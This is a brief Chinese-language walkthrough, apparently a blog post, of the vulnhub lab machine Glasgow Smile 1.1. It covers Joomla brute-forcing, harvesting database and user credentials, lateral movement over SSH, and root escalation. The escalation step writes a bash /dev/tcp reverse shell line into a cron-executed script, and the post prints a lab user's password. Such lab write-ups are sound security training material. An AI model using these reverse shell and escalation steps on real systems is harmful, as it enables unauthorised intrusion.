vulhub-Glasgow Smile:1.1

端口扫描

小丑

目录爆破

使用使用“ joomscan ”并列出版本,目录

咱们该一下/etc/host

查一下默认的账号密码(不行)

用bp爆破得到

现在是想反弹shell(我们进来是admin权限)

kali监听

咱们想先去枚举一下joomla目录下有没有有凭证密码的文件

在config.php里面发现

mysql -u joomla -p

show databases; use batjoke;

show tables; select * from taskforce;

有账号密码(base64)

???AllIHaveAreNegativeThoughts??? 解密密码

ssh连接 rob

有个help文件看看

看着像 rot13 CyberChef 解密

对密码进行”base64解码

得到用户“ abner ”的密码。

我们之前查看/etc/passwd是由abner penguin rob三个用户的,

find / -iname penguin 2>/dev/null 找与penguin有关的文件       -iname就是包含

利用abner的密码

账号:penguin,密码:scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz

cat PeopleAreStartingToNotice.txt

用pspy64

结合文件内容,发现.trash_old属于用户penguin,root组并且任何人都可执行。

echo "bash -c 'bash -i >& /dev/tcp/192.168.44.143/4444 0>&1'" >> .trash_old

要记得把exit 0给用#注释

kali监听

  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值